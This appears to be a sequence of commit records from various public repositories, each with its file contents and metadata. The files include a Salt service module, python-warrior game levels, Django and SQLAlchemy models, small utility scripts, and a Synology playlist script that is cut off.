salt '*' service.restart <service name>
'''
cmd = '/usr/sbin/svcadm restart {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def status(name, sig=None):
'''
Return the status for a service, returns a bool whether the service is
running.
CLI Example::
salt '*' service.status <service name>
'''
cmd = '/usr/bin/svcs -H -o STATE {0}'.format(name)
line = __salt__['cmd.run'](cmd).strip()
if line == 'online':
return True
else:
return False
def enable(name):
'''
Enable the named service to start at boot
CLI Example::
salt '*' service.enable <service name>
'''
cmd = '/usr/sbin/svcadm enable {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def disable(name):
'''
Disable the named service to start at boot
CLI Example::
salt '*' service.disable <service name>
'''
cmd = '/usr/sbin/svcadm disable {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def enabled(name):
'''
Check to see if the named service is enabled to start on boot
CLI Example::
salt '*' service.enabled <service name>
'''
return name in get_enabled()
def disabled(name):
'''
Check to see if the named service is disabled to start on boot
CLI Example::
salt '*' service.disabled <service name>
'''
return name in get_disabled()
| apache-2.0 | Python |
|
a91a942c45921b64fe0d740d81604dba921c214e | Create folder for QC and CNV cutoff codes | suzannerohrback/somaticCNVpipeline,suzannerohrback/somaticCNVpipeline | bin/cutoffs/__init__.py | bin/cutoffs/__init__.py | mit | Python |
||
e40b92966762dfadff53355e9e38636a4769543f | Add intermediate tower 2 | arbylee/python-warrior | pythonwarrior/towers/intermediate/level_002.py | pythonwarrior/towers/intermediate/level_002.py | # ----
# |@s |
# | sS>|
# ----
level.description("Another large room, but with several enemies "
"blocking your way to the stairs.")
level.tip("Just like walking, you can attack_ and feel in multiple "
"directions ('forward', 'left', 'right', 'backward').")
level.clue("Call warrior.feel(direction).is_enemy() in each direction "
"to make sure there isn't an enemy beside you "
"(attack if there is). "
"Call warrior.rest_ if you're low and health when there "
"are no enemies around.")
level.time_bonus(40)
level.ace_score(84)
level.size(4, 2)
level.stairs(3, 1)
def add_abilities(warrior):
warrior.add_abilities('attack_')
warrior.add_abilities('health')
warrior.add_abilities('rest_')
level.warrior(0, 0, 'east', func=add_abilities)
level.unit('sludge', 1, 0, 'west')
level.unit('thick_sludge', 2, 1, 'west')
level.unit('sludge', 1, 1, 'north')
| mit | Python |
|
71d66fb3bdbcb38d29accb6bdfbf4ac8b2996e89 | Add intermediate tower 3 | arbylee/python-warrior | pythonwarrior/towers/intermediate/level_003.py | pythonwarrior/towers/intermediate/level_003.py | # ---
# |>s |
# |s@s|
# | C |
# ---
level.description("You feel slime on all sides, you're surrounded!")
level.tip("Call warrior.bind_(direction) to bind an enemy to keep him "
"from attacking. Bound enemies look like captives.")
level.clue("Count the number of enemies around you. Bind an enemy if "
"there are two or more.")
level.time_bonus(50)
level.ace_score(101)
level.size(3, 3)
level.stairs(0, 0)
def add_abilities(warrior):
warrior.add_abilities('bind_')
warrior.add_abilities('rescue_')
level.warrior(1, 1, 'east', func=add_abilities)
level.unit('sludge', 1, 0, 'west')
level.unit('captive', 1, 2, 'west')
level.unit('sludge', 0, 1, 'west')
level.unit('sludge', 2, 1, 'west')
| mit | Python |
|
260cb76132bfe618b58cf34ad8dd61f59e847f90 | create table | techbureau/zaifbot,techbureau/zaifbot | zaifbot/models/nonce.py | zaifbot/models/nonce.py | from sqlalchemy import Column, Integer, String, DateTime
from datetime import datetime
from zaifbot.models import Base
class Nonce(Base):
__tablename__ = 'nonces'
id = Column(Integer, primary_key=True)
key = Column(String, nullable=False)
secret = Column(String, nullable=False)
nonce = Column(Integer, default=0, nullable=False)
created_at = Column(DateTime, default=datetime.now())
updated_at = Column(DateTime, default=datetime.now(), onupdate=datetime.now())
| mit | Python |
|
a72567202e9b4024758706c00f016153ec04a53d | Create render.py | duboviy/pymolecule | render.py | render.py | #! /usr/bin/python3
from random import random
import pyglet
from pyglet.window import key, Window
from pyglet.gl import *
from pyglet.gl.glu import *
window = Window()
@window.event
def on_draw():
pass # TODO: implement!
@window.event
def on_resize(width, height):
pass # TODO: implement!
@window.event
def on_key_press(symbol, modifiers):
if symbol == key.LEFT:
update_frame(-1)
elif symbol == key.RIGHT:
update_frame(1)
if __name__=="__main__":
pyglet.clock.schedule_interval(update_frame, 0.02)
pyglet.app.run()
| mit | Python |
|
77dca533f2d2fe94b233bd48561e1ed887928265 | add sample.py | elliot79313/line-bot-without-bot-account | sample.py | sample.py | #-*- coding: UTF-8 -*-
# https://github.com/carpedm20/LINE
from line import LineClient, LineGroup, LineContact
f = open("credentials")
ID = f.readline().strip()
PASSWD = f.readline().strip()
f.close()
client = LineClient(ID, PASSWD, com_name="line_api_demo")
friends = client.contacts
for i, friend in enumerate(friends):
print i, friend
#for i, group in enumerate(groups):
# print i, group
friend = client.contacts[429]
friend.sendMessage("hello world! 本訊息由機器人寄送 XD")
| bsd-3-clause | Python |
|
db195957288ef7b6c5c9de6551689d4d06db28c1 | Create add_digits.py | lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges | lintcode/naive/add_digits/py/add_digits.py | lintcode/naive/add_digits/py/add_digits.py | class Solution:
# @param {int} num a non-negative integer
# @return {int} one digit
def addDigits(self, num):
while len(str(num)) > 1:
num = sum(map(int, str(num)))
return num
| mit | Python |
|
836845abde53ee55bca93f098ece78880ab6b5c6 | Use same variable names as testing environment | pombredanne/PyMISP,iglocska/PyMISP | examples/events/create_massive_dummy_events.py | examples/events/create_massive_dummy_events.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import url, key
import argparse
import tools
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create a given number of event containing a given number of attributes eachh.')
parser.add_argument("-l", "--limit", type=int, help="Number of events to create (default 1)")
parser.add_argument("-a", "--attribute", type=int, help="Number of attributes per event (default 3000)")
args = parser.parse_args()
misp = PyMISP(url, key, True, 'json')
if args.limit is None:
args.limit = 1
if args.attribute is None:
args.attribute = 3000
for i in range(args.limit):
tools.create_massive_dummy_events(misp, args.attribute)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import misp_url, misp_key, misp_verifycert
import argparse
import tools
def init(url, key):
return PyMISP(url, key, misp_verifycert, 'json')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create a given number of event containing a given number of attributes eachh.')
parser.add_argument("-l", "--limit", type=int, help="Number of events to create (default 1)")
parser.add_argument("-a", "--attribute", type=int, help="Number of attributes per event (default 3000)")
args = parser.parse_args()
misp = init(misp_url, misp_key)
if args.limit is None:
args.limit = 1
if args.attribute is None:
args.attribute = 3000
for i in range(args.limit):
tools.create_massive_dummy_events(misp, args.attribute)
| bsd-2-clause | Python |
2d12c640e42e83580ee27933f0ad9bed2ebcc169 | add allauth and make owner of audio required | saanobhaai/apman,saanobhaai/apman | satsound/migrations/0007_auto_20170115_0331.py | satsound/migrations/0007_auto_20170115_0331.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-15 03:31
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('satsound', '0006_auto_20161230_0403'),
]
operations = [
migrations.AlterField(
model_name='satelliteaudio',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| mit | Python |
|
a635a8d58e46cf4ef1bc225f8824d73984971fee | Add the answer to the sixth question of Assignment 3 | SuyashD95/python-assignments | countVowels.py | countVowels.py | """ Q6- Write a program that counts up the number of vowels contained in the string s. Valid vowels are: 'a', 'e', 'i',
'o', and 'u'. For example, if s = 'azcbobobegghakl', your program should print: Number of vowels: 5
"""
# Using the isVowel function from isVowel.py module (Answer of fifth question of Assignment 3)
def isVowel( char ):
# Converting the letter to lowercase for our convenience and hence, we do not need to check character's case and hence, simplifies the problem
# str.lower( char )
# The above function has been commented out since this is not required in this problem.. But, the above built-in function might be useful in normal cases.
# Splitting the condition: 'a' or 'e' or 'i' or 'o' or 'u' to make it more readable and easier to understand.
is_char_a = char == 'a'
is_char_e = char == 'e'
is_char_i = char == 'i'
is_char_o = char == 'o'
is_char_u = char == 'u'
is_char_vowel = is_char_a or is_char_e or is_char_i or is_char_o or is_char_u
return is_char_vowel
def countVowels( string ):
if str.islower( string ):
count = 0 # Counts the number of vowels
for letter in string:
if isVowel( letter ):
count += 1
print( "Number of vowels: " + str( count ) )
else:
if len( string ):
print( "Error: All the characters in the string should be in LOWERCASE." )
else:
print( "Error: The string is EMPTY." )
string = input( "Enter the string: " )
countVowels( string ) | mit | Python |
|
58fabd7929a4c712f5e87a39aaf8c34bae8759b8 | Add photos to the admin | blancltd/django-quick-photos,kmlebedev/mezzanine-instagram-quickphotos | quickphotos/admin.py | quickphotos/admin.py | from django.contrib import admin
from .models import Photo
@admin.register(Photo)
class PhotoAdmin(admin.ModelAdmin):
list_display = ('user', 'caption', 'created')
list_filter = ('created',)
date_hierarchy = 'created'
readonly_fields = (
'photo_id', 'user', 'image', 'created', 'caption', 'link', 'like_count', 'comment_count')
fieldsets = (
(None, {
'fields': readonly_fields,
}),
)
def has_add_permission(self, request):
return False
| bsd-3-clause | Python |
|
f7035a6c328bb237dd3c9be5d9da805606e059ae | Create adjust_xml_impath.py | grehujt/SmallPythonProjects,grehujt/SmallPythonProjects,grehujt/SmallPythonProjects | object_detection/adjust_xml_impath.py | object_detection/adjust_xml_impath.py | import os
import glob
import re
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--input_xml_dir', type=str, default='./annot', help='path to root dir of xmls')
ap.add_argument('-s', '--subfolder', type=str, default='images', help='name of image subfolder')
args = vars(ap.parse_args())
xmls = glob.glob(os.path.join(args['input_xml_dir'], '*xml'))
print('found %d xmls.' % len(xmls))
subfolder = args['subfolder'] if not args['subfolder'].endswith('/') else args['subfolder'][:-1]
print('image sub folder:', subfolder)
pattern1 = r'<filename>(.*?)</filename>'
pattern2 = r'<folder>.*?</folder>'
pattern3 = r'<path>.*?</path>'
for xml in xmls:
with open(xml, 'r') as fin:
s = fin.read()
filename = re.findall(pattern1, s)[0]
s = re.sub(pattern2, '<folder>%s</folder>' % args['subfolder'], s)
s = re.sub(pattern3, '<path>%s/%s/%s</path>' % (os.getcwd(), args['subfolder'], filename), s)
with open(xml, 'wb') as fout:
fout.write(s)
| mit | Python |
|
0266a6cec641f244a8788f50f80ac3f11f87e1e4 | Add back fix_root script | brianjgeiger/osf.io,CenterForOpenScience/osf.io,CenterForOpenScience/osf.io,mfraezz/osf.io,HalcyonChimera/osf.io,icereval/osf.io,laurenrevere/osf.io,binoculars/osf.io,laurenrevere/osf.io,CenterForOpenScience/osf.io,HalcyonChimera/osf.io,adlius/osf.io,mfraezz/osf.io,felliott/osf.io,CenterForOpenScience/osf.io,mfraezz/osf.io,caseyrollins/osf.io,crcresearch/osf.io,aaxelb/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,brianjgeiger/osf.io,baylee-d/osf.io,Johnetordoff/osf.io,adlius/osf.io,leb2dg/osf.io,TomBaxter/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,Johnetordoff/osf.io,mattclark/osf.io,pattisdr/osf.io,HalcyonChimera/osf.io,sloria/osf.io,HalcyonChimera/osf.io,crcresearch/osf.io,adlius/osf.io,Johnetordoff/osf.io,binoculars/osf.io,binoculars/osf.io,baylee-d/osf.io,icereval/osf.io,icereval/osf.io,leb2dg/osf.io,saradbowman/osf.io,caseyrollins/osf.io,chennan47/osf.io,cslzchen/osf.io,erinspace/osf.io,erinspace/osf.io,TomBaxter/osf.io,felliott/osf.io,caseyrollins/osf.io,baylee-d/osf.io,pattisdr/osf.io,aaxelb/osf.io,cslzchen/osf.io,erinspace/osf.io,felliott/osf.io,laurenrevere/osf.io,cslzchen/osf.io,brianjgeiger/osf.io,chennan47/osf.io,mattclark/osf.io,sloria/osf.io,crcresearch/osf.io,saradbowman/osf.io,aaxelb/osf.io,TomBaxter/osf.io,mattclark/osf.io,adlius/osf.io,sloria/osf.io,leb2dg/osf.io,cslzchen/osf.io,leb2dg/osf.io,felliott/osf.io,chennan47/osf.io,aaxelb/osf.io | scripts/fix_root.py | scripts/fix_root.py | import sys
import logging
from website.app import setup_django
setup_django()
from scripts import utils as script_utils
from osf.models import AbstractNode
from framework.database import paginated
logger = logging.getLogger(__name__)
def main(dry=True):
count = 0
for node in paginated(AbstractNode, increment=1000):
true_root = node.get_root()
if not node.root or node.root.id != true_root.id:
count += 1
logger.info('Setting root for node {} to {}'.format(node._id, true_root._id))
if not dry:
AbstractNode.objects.filter(id=node.id).update(root=true_root)
logger.info('Finished migrating {} nodes'.format(count))
if __name__ == '__main__':
dry = '--dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
main(dry=dry)
| apache-2.0 | Python |
|
ecc15e50967f61e9e8ba8a96d4b8f6855c77b401 | Create geoprocess_exposure.py | wfclark/hamlet,wfclark/hamlet | hurricane/geoprocess_exposure.py | hurricane/geoprocess_exposure.py | import sys
import os
import datetime
import psycopg2
import pandas
from subprocess import call, Popen
conn_string = "dbname='hamlethurricane' user=postgres port='5432' host='127.0.0.1' password='password'"
os.system("exit")
os.system("exit")
print "Connecting to database..."
try:
conn = psycopg2.connect(conn_string)
except Exception as e:
print str(e)
sys.exit()
print "Connected!\n"
hurricane_name = 'ARTHUR'
dataframe_cur = conn.cursor()
dataframe_sql = """Select * from hurricane_{}""".format(hurricane_name)
dataframe_cur.execute(dataframe_sql)
data = dataframe_cur.fetchall()
colnames = [desc[0] for desc in dataframe_cur.description]
dataframe = pandas.DataFrame(data)
dataframe.columns = colnames
conn.commit()
range_feat = range(len(dataframe)-1)
range_feat_strp = str(range_feat).strip('[]')
range_feat_strp_v2 = range_feat_strp.split(',')
print range_feat_strp_v2
drop_if_sql = """drop table if exists hurricane_{}_parcels, exposed_parcels""".format(hurricane_name)
drop_if_cur = conn.cursor()
drop_if_cur.execute(drop_if_sql)
creation_cur = conn.cursor()
creation_sql = """create table hurricane_{}_parcels as
select * from dare_4326""".format(hurricane_name,hurricane_name)
creation_cur.execute(creation_sql)
conn.commit()
add_cur = conn.cursor()
add_sql = """alter table hurricane_{}_parcels
add column andrew_impact character varying(50),
add column iso_time character varying (19)
""".format(hurricane_name)
add_cur.execute(add_sql)
conn.commit()
buffer_cur = conn.cursor()
intersect_cur = conn.cursor()
for key in range(1,len(dataframe)-1):
sql = """create or replace view vw_parcels_impact_{} as
select a.nparno, b.iso_time, b.ogc_fid, a.geom as geom
from dare_4326 as a
inner join vw_rmw_{} as b
on st_intersects(b.geom,a.geom)
group by a.nparno, b.iso_time, b.ogc_fid, a.geom;""".format(key, key)
print sql
intersect_cur.execute(sql)
conn.commit()
update_cur = conn.cursor()
for key in range(1, len(dataframe)-1):
sql = """update hurricane_{}_parcels as a
set iso_time = b.iso_time
from vw_parcels_impact_{} as b
where a.nparno = b.nparno""".format(hurricane_name, key)
print sql
update_cur.execute(sql)
conn.commit()
exposed_cur = conn.cursor()
exposed_sql = """create table exposed_parcels as
select * from hurricane_{}_parcels where iso_time is not null""".format(hurricane_name, hurricane_name)
exposed_cur.execute(exposed_sql)
exposed_cur = conn.cursor()
conn.commit()
| bsd-3-clause | Python |
|
ac3a3b583b028e53d80749eaaee58b4eb80d1c6a | Implement stack functionality | MikeDelaney/CodeEval | stack/stack.py | stack/stack.py |
class Node(object):
def __init__(self, value=None, next_node=None):
self.value = value
self.next_node = next_node
class Stack(object):
def __init__(self, head=None):
self.head = head
def push(self, data):
self.head = Node(data, self.head)
def pop(self):
if self.head:
retval = self.head.value
self.head = self.head.next_node
return retval
raise LookupError
def write_output(self):
output = ''
count = 1
while self.head:
if count % 2 != 0:
output += str(self.pop()) + ' '
else:
self.pop()
count += 1
return output.rstrip()
| mit | Python |
|
a6137714c55ada55571759b851e1e4afa7818f29 | Add cli tool to delete documents. | kernelci/kernelci-backend,joyxu/kernelci-backend,kernelci/kernelci-backend,joyxu/kernelci-backend,joyxu/kernelci-backend | app/utils/scripts/delete-docs.py | app/utils/scripts/delete-docs.py | #!/usr/bin/python
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Basic command line script to delete documents."""
import argparse
import sys
import models
import utils
import utils.db
COLLECTIONS = [
models.BOOT_COLLECTION,
models.DEFCONFIG_COLLECTION,
models.JOB_COLLECTION,
models.LAB_COLLECTION
]
ALL_COLLECTIONS = [
"all"
]
ALL_COLLECTIONS.extend(COLLECTIONS)
def parse_fields(fields):
for field in fields:
if "=" in field:
yield field.split("=", 1)
else:
utils.LOG.error("Field %s is not valid, not considered", field)
def _delete_with_spec(collection, spec_or_id, database):
ret_val = None
if collection == "all":
utils.LOG.info("Deleting documents in all collections")
for coll in COLLECTIONS:
utils.LOG.info("Deleting from %s...", coll)
ret_val = utils.db.delete(database[coll], spec)
else:
ret_val = utils.db.delete(database[collection], spec_or_id)
if ret_val == 200:
utils.LOG.info("Documents identified deleted: %s", spec_or_id)
else:
utils.LOG.error(
"Error deleting documents with the provided values: %s",
spec_or_id)
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Import boots from disk",
version=0.1
)
parser.add_argument(
"--collection", "-c",
type=str,
help="The name of the job to import",
dest="collection",
required=True,
choices=ALL_COLLECTIONS
)
parser.add_argument(
"--field", "-f",
help=(
"The necessary fields to identify the elements to delete; "
"they must be defined as key=value pairs"
),
dest="fields",
action="append",
required=True
)
args = parser.parse_args()
collection = args.collection
fields = args.fields
spec = {
k: v for k, v in parse_fields(fields)
}
if spec:
database = utils.db.get_db_connection({})
_delete_with_spec(collection, spec, database)
else:
utils.LOG.error("Don't know what to look for...")
sys.exit(1)
| lgpl-2.1 | Python |
|
c71a3f1adbf310c63ce9ab7611cf0e198ffe69da | Add load test | Calysto/metakernel | metakernel/magics/tests/test_load_magic.py | metakernel/magics/tests/test_load_magic.py |
from metakernel.tests.utils import get_kernel
def test_load_magic():
kernel = get_kernel()
ret = kernel.do_execute("%%load %s" % __file__)
assert 'def test_load_magic' in ret['payload'][0]['text']
| bsd-3-clause | Python |
|
e575f343f55fd54994fdb1f4d02fe6e2e52ba056 | add phonetizer.py - really | bhallen/icelandic-transcriber | phonetizer.py | phonetizer.py | import re
class Phonetizer():
# Define shorthands for phonological classes
ph_classes = {
'C' : 'p|t|k|b|d|g',
'V' : 'a|e|i|o|u|y'
}
def __init__(self, mappings_filename):
with open(mappings_filename) as mfile:
self.read_mfile(mfile)
def read_mfile(self, mfile):
"""
"""
self.ortho_maps = []
self.phone_maps = []
for line in mfile:
sline = line[:-1].split('\t') # fix this using csv so the user doesn't have to have an extra blank line!
if len(sline) == 2:
self.ortho_maps.append((sline[0],sline[1]))
elif len(sline) == 3:
self.phone_maps.append((sline[0],sline[1]))
self.ortho_maps.sort(key=lambda x: len(x[0]))
self.ortho_maps.reverse()
def read_wfile(self, ttfilename):
with open(ttfilename) as ttfile:
return [(line[:-1].split('\t')[0],line[:-1].split('\t')[1]) for line in ttfile]
def run_tests(self, ttfilename):
cases = self.read_wfile(ttfilename)
for c in cases:
transcription = self.phonetize(c[0])
if transcription != c[1]:
print('Output [{}] should have been [{}].'.format(transcription, c[1]))
def phonetize(self, ortho):
result = ['' for character in ortho]
# go from ortho to initial transcription
for om in self.ortho_maps:
hits = re.finditer(om[0], ortho)
for hit in hits:
result[hit.start()] = om[1]
ortho = ''.join(['*' if i in range(hit.start(), hit.end()) else c for i,c in enumerate(ortho)])
for i,character in enumerate(ortho):
if character != '*':
result[i] = character
result = ''.join(result)
# apply "phonology"
loop_input_str = ''.join(result)
new_result = ['' for character in result]
while True:
loop_input = loop_input_str
new_result = [c for c in loop_input_str]
for pm in self.phone_maps:
hits = re.finditer(pm[0], loop_input_str)
for hit in hits:
new_result[hit.start()] = pm[1]
for i in range(hit.start()+1, hit.end()):
new_result[i] = ''
loop_input = ''.join(['*' if i in range(hit.start(), hit.end()) else c for i,c in enumerate(loop_input)])
if ''.join(new_result) == loop_input_str:
return loop_input_str
else:
loop_input_str = ''.join(new_result)
#### Quick, temp lines for testing
p = Phonetizer('test_mappings.txt')
p.run_tests('test_ortho.txt') | bsd-3-clause | Python |
|
163da52a48eb0d84cde47f7cfe99e1188350db47 | Add MOBIB Basic reader script | bparmentier/mobib-reader | mobib_basic.py | mobib_basic.py | #!/bin/env python3
import sys
from smartcard.System import readers
CALYPSO_CLA = [0x94]
SELECT_INS = [0xA4]
READ_RECORD_INS = [0xB2]
GET_RESPONSE_INS = [0xC0]
TICKETING_COUNTERS_FILE_ID = [0x20, 0x69]
def main():
local_readers = readers()
if local_readers:
if len(local_readers) == 1:
readerIndex = 0
else:
for i, reader in enumerate(local_readers):
print("[{}]: {}".format(i, reader))
readerIndex = int(input("Select a reader: "))
else:
print("No reader detected")
sys.exit(1)
calypso = local_readers[readerIndex].createConnection()
calypso.connect()
select_apdu = CALYPSO_CLA + SELECT_INS + [0x00, 0x00, 0x02] + TICKETING_COUNTERS_FILE_ID + [0x00]
data, sw1, sw2 = calypso.transmit(select_apdu)
if sw1 == 0x61:
get_response_apdu = [0x00] + GET_RESPONSE_INS + [0x00, 0x00, sw2]
data, sw1, sw2 = calypso.transmit(get_repsonse_apdu)
read_record_apdu = CALYPSO_CLA + READ_RECORD_INS + [0x01, 0x04, 0x1D]
data, sw1, sw2 = calypso.transmit(read_record_apdu)
if sw1 == 0x90:
# FIXME: each chunk of remaining trips stored on 3 bytes?
#chunks = [data[x:x+3] for x in range(0, len(data), 3)]
#total = 0
#for chunk in chunks:
# total += chunk[2]
#print("Number of remaining trips: {}".format(tot = chunks[i][2] for i in chunks))
print("Number of remaining trips: {}".format(sum(data)))
else:
print("Error getting number of remaining trips")
sys.exit(2)
if __name__ == '__main__':
main()
| mit | Python |
|
97531bdb1501748c7039d194e98408245dc5d2b2 | Make graphflow loading script | guoarthur/btc-viz,guoarthur/btc-viz,guoarthur/btc-viz,guoarthur/btc-viz | load-tx-to-graphflow.py | load-tx-to-graphflow.py | from constants import *
import csv
walletsMap={} #address -> number OR transaction_id->number
lastNumber = 0
with open(IN_TRANSACTION_CSV_LOCATION, 'rb') as tx_in_file:
in_reader = csv.reader(tx_in_file, delimiter=",")
for row in in_reader:
tx_hash = row[0]
wallet_addr = row[1]
tx_amt = row[2]
if wallet_addr in walletsMap:
wallet_id = walletsMap[wallet_addr]
else:
wallet_id = lastNumber
walletsMap[wallet_addr] = wallet_id
lastNumber+=1
if tx_hash in walletsMap:
tx_id = walletsMap[tx_hash]
else:
tx_id = lastNumber
walletsMap[tx_hash] = tx_id
lastNumber+=1
print("CREATE ("+str(wallet_id)+":wallet {address: {"+wallet_addr+"}}) -[:SENT {satoshi: {"+str(tx_amt)+"}}] -> ("+str(tx_id)+":tx {hash:"+tx_hash+"})")
with open(OUT_TRANSACTION_CSV_LOCATION, 'rb') as tx_out_file:
out_reader = csv.reader(tx_out_file, delimiter=",")
for row in out_reader:
tx_hash = row[0]
wallet_addr = row[1]
tx_amt = row[2]
if wallet_addr in walletsMap:
wallet_id = walletsMap[wallet_addr]
else:
wallet_id = lastNumber
walletsMap[wallet_addr] = wallet_id
lastNumber+=1
if tx_hash in walletsMap:
tx_id = walletsMap[tx_hash]
else:
tx_id = lastNumber
walletsMap[tx_hash] = tx_id
lastNumber+=1
print("CREATE ("+str(wallet_id)+":wallet {address: {"+wallet_addr+"}}) -[:RECEIVED {satoshi: {"+str(tx_amt)+"}}] -> ("+str(tx_id)+":tx {hash:"+tx_hash+"})")
| apache-2.0 | Python |
|
7f6aab7dc177dc1178eca30e0ba40874b217e7cf | Create *variable.py | joshavenue/python_notebook | *variable.py | *variable.py | def num(*nums): // One * takes in any number of single data type, in this case : Int
sum = 0
for x in nums:
sum += x
return sum
sum(22,33,44,55,66) // You can type as many numbers as you wish
def whatever(**kwargs): // Double ** take more than just a type of data, in this case, there is Str and Int
print(first_name)
print(last_name)
print(age)
whatever('first_name': 'John', 'last_name': 'Lee', 'age': 22) // Create a dictionary
| unlicense | Python |
|
70da5f3657ee847f315b0d0dfbe5adb393c55ca6 | add system_info.py | simomarsili/ndd | system_info.py | system_info.py | # -*- coding: utf-8 -*-
"""System info"""
import platform
import subprocess
import sys
import numpy
class SystemInfo:
"""Collect system info."""
@property
def platform(self):
"""Info on the underlying platform."""
return platform.platform()
@property
def architecture(self):
"""System architecture."""
is_64bits = sys.maxsize > 2**32
arch = '64bits' if is_64bits else '32bits'
return arch
@property
def python(self):
"""Python version."""
return sys.version
@property
def numpy(self):
"""Numpy version."""
return numpy.__version__
@property
def gfortran(self):
"""gfortran version."""
return subprocess.run(['gfortran', '-v'],
stderr=subprocess.PIPE).stderr.decode()
@classmethod
def attrs(cls):
"""Available system infos."""
return [p for p in dir(cls) if isinstance(getattr(cls, p), property)]
def __repr__(self):
fmt = '\n'.join(['%s'] * 3 + ['\n'])
return ''.join(
[fmt % (a, '=' * len(a), getattr(self, a)) for a in self.attrs()])
if __name__ == '__main__':
# print out system info
print(SystemInfo())
| bsd-3-clause | Python |
|
2910f54c75e3f7cc9d7be08886547060a7e69b69 | Implement basic CLI control | joushou/dispatch,joushou/dispatch | pusher.py | pusher.py | from __future__ import print_function, absolute_import, unicode_literals, division
from stackable.stack import Stack
from stackable.utils import StackablePickler
from stackable.network import StackableSocket, StackablePacketAssembler
from stackable.stackable import StackableError
from runnable.network import RunnableServer, RequestObject
from subprocess import Popen, PIPE
from threading import Thread, Lock
from sys import argv
class DispatchPusher(object):
def __init__(self, ip=None, port=None):
self.stack = None
if ip != None and port != None:
self.connect(ip, port)
def connect(self, ip, port):
self.stack = Stack((StackableSocket(ip=ip, port=port),
StackablePacketAssembler(),
StackablePickler()))
def push_module(self, name, module):
self.stack.write({'cmd': 'module', 'args': {'name': name, 'module': module}})
def dispatch(self, dispatcher, module):
self.stack.write({'cmd': 'dispatch', 'args': {'dispatcher': dispatcher, 'module': module}})
def status(self, dispatcher, job):
self.stack.write({'req': 'status', 'args': {'dispatcher': dispatcher, 'id': job}})
def close(self):
self.stack.close()
def monitor(self):
while True:
o = self.stack.read()
print(o)
dp = DispatchPusher(argv[1], int(argv[2]))
a = Thread(target=dp.monitor)
a.daemon = True
a.start()
mode = 'file'
while True:
x = raw_input('[%s] ' % mode)
if x == '':
continue
if x[:2] == '!!':
mode = x[2:]
print(' --> Changing mode to %s' % mode)
continue
if mode == 'file':
name = x.rpartition('/')[2].partition('.py')[0]
f = b''
try:
f = open(x).read()
except:
print(' --> Failed to read %s' % name)
code = compile(f, name, mode='exec', dont_inherit=True)
print(' --> Prepared %s' % name)
dp.push_module(name, code)
elif mode == 'dispatch':
x = x.partition(' ')
print(' --> Dispatching', x[2], 'to', x[0])
dp.dispatch(x[0], x[2])
elif mode == 'console':
if x == 'close':
dp.close()
raise KeyboardInterrupt()
print("[PUSHER] Ready")
| mit | Python |
|
e10ed243f6cae2e020d468bbd13a619e45ed0c5d | Add a forgotten migration | WebCampZg/conference-web,WebCampZg/conference-web,WebCampZg/conference-web | sponsors/migrations/0011_auto_20170629_1208.py | sponsors/migrations/0011_auto_20170629_1208.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 10:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sponsors', '0010_auto_20170627_2001'),
]
operations = [
migrations.AlterField(
model_name='sponsor',
name='type',
field=models.CharField(choices=[('diamond', 'Diamond Sponsor'), ('lanyard', 'Lanyard Sponsor'), ('track', 'Track Sponsor'), ('foodanddrinks', 'Food & Drinks Sponsor'), ('standard', 'Standard Sponsor'), ('supporter', 'Supporter Sponsor'), ('mainmedia', 'Main Media Sponsor'), ('media', 'Media sponsors')], default='standard', max_length=255),
),
]
| bsd-3-clause | Python |
|
ca5d47f3749c188d0858e996ba0253077260cd6c | Create GetUserGraphInstagram.py | haddadi/Instagram,haddadi/Instagram | GetUserGraphInstagram.py | GetUserGraphInstagram.py | #! /bin/bash
for (( i=1; i <= 5; i++ ))
do
userid=$i
curl https://api.instagram.com/v1/users/$userid/follows?access_token=XXXXXX > followers/$userid.followers
curl https://api.instagram.com/v1/users/$userid/followed-by?access_token=XXXXXX > followedby/$userid.followedby
done
| mit | Python |
|
a8f4f0aa06e1469e758d5775bfea4176c7561e9f | Create stop_playlist.py | CTarel/homeassistant,CTarel/homeassistant | HA/syno/stop_playlist.py | HA/syno/stop_playlist.py | #!/usr/bin/python
import sys
import http.cookiejar, urllib.request, urllib.error, urllib.parse
import json
import codecs
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
IP_syno = "IP_OF_YOUR_NAS"
LOGIN = "********"
PASSWORD = "********"
player = sys.argv[1]
opener.addheaders = [
('User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11'),
]
#URL to send requests to Synology
urlAuth = "http://" + IP_syno + ":5000/webapi/auth.cgi?api=SYNO.API.Auth&version=2&method=login&account=" + LOGIN + "&passwd=" \
+ PASSWORD + "&session=AudioStation&format=cookie"
urlPlayers = "http://" + IP_syno + ":5000/webapi/AudioStation/remote_player.cgi?api=SYNO.AudioStation.RemotePlayer&version=1&method=list"
opener.open(urlAuth)
#Get Players list as JSON
